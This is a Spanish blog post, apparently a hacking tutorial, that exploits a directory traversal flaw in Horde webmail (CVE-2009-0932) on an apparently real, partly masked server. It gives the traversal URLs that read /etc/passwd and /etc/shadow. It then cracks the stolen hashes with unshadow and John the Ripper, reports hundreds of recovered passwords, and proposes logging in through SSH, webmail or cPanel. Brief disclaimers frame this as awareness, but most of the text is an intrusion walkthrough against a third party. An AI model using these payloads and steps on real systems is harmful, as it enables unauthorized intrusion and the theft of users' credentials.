Jonh + Directory Transversal Vulnerability

Para aquellos de ustedes que todavía no han oído hablar de John the Ripper es una herramienta libre para el crackeo de contraseñas escrita principalmente en C. Antes de seguir adelante, debemos decirles que aunque confiamos en nuestros lectores, no aconseja ninguna actividad maliciososa que pueda realizarse utilizando esta herramienta o cualquier otra herramienta de las que hablamos en el pasado.

Cabe mencionar que hay otras herramientas de crackeo de contraseñas como Hashcat, passwordpro, etc.

Las herramientas relacionadas con la seguridad son a menudo como un arma de doble filo, ya que pueden ser utilizadas para el bien pero también para hacer cosas malas. Así que a pesar de que puede sonar tentador, le recomendamos que se abstenga de cualquier actividad perjudicial.

Lo primero será instalar el John the Ripper (En este caso para Debian):

$ aptitude install john

Aunque si usan alguna distribución de seguridad como kalilinux ya la trae integrada. Aprovecharemos un sitio vulnerable a directory transversal (o LFI) en Horde mail con CVE-2009-0932 en donde haremos una escalada de directorios para llegar al archivo shadow que contiene la contraseñas encriptadas, y el archivo password que contiene el nombre de los usuarios del sistema.

https://mail.***.***.**/hordewebmail/util/barcode.php?type=../../../../../../../../../../../etc/passwd%00

https://mail.***.***.**/hordewebmail/util/barcode.php?type=../../../../../../../../../../../etc/shadow%00

Los archivos passwd y shadow descargados de los sitios estarán ubicados en un directorio a trabajar.

Si deseas saber más acerca de estos archivos puedes leer algún otro artículo, ya que aquí me enfocaré principalmente en el crackeo de los hashes. http://www.nexolinux.com/ficheros-de-usuarios-etcpasswd-y-etcshadow/.

Lo que haremos continuación es utilizar una utilidad que trae John llamada un unshadow que vamos a utilizar para crear un archivo resultante de la combinación los archivos passwd y shadow.

$ unshadow /root/tmp/passwd /root/tmp/shadow > mispasswords

Por último, ejecutamos John the Ripper sobre el archivo que hemos creado con unshadow.

$ john mispasswords

Este comando, sin ninguna otra opción, prueba primero el modo single crack, después usa un diccionario con reglas y, por último, utiliza el modo incremental. De esta forma si la contraseña de cualquiera de los usuarios del sistema es mala, John the Ripper la encontrará en cuestión de segundos o minutos. En este caso la imagen muestra que cargó 3106 passwords hashes con 3106 saltos diferentes, y en 20 minutos llegó al 13% crackeando 7 passwords para sus respectivos usuarios. Por cuestión de tiempo paré el proceso con control + C.

Para usar solamente el modo single (este modo) ejecutamos:

$ john --single mispasswords

Para usar solamente el modo incremental ejecutamos:

$ john --incremental mispasswords

Otra opción es la de usar un diccionario, en este ejemplo usaré uno propio, pero ustedes pueden descargar uno propio de la página siguiente: https://wiki.skullsecurity.org/Passwords#Password_dictionaries

Para usar solamente el modo diccionarios ejecutamos (más rápido):

$ john --wordlist=/root/tmp/milw0rm.txt --rules mispasswords

Como nos damos cuenta han sido crackeadas 377 passwords en 9 minutos completando un 0.12% del proceso ya que lo he parado por cuestiones de tiempo lo cual es un resultado bastante más rápido comparados a los otros métodos.

John the Ripper guarda las contraseñas crackeadas en ~/.john/john.pot.

Para mostrar estas contraseñas ejecutamos el siguiente comando:

$ john --show mispasswords

Lo último seria conectarnos por SSH, para ello verificamos si tiene el puerto 22 abierto con nmap.

En este caso el puerto lo tiene filtrado por lo que no podríamos autenticarnos, solo nos queda tratar de autenticarnos por algún otro servicio como webmail o cpanel.

El descifrado de contraseñas es un proceso intensivo del CPU.

Espero que esto nos permita evitar el uso de contraseñas débiles y tener bien configurado y asegurado nuestro servidor.

./zer0max

Deja un comentario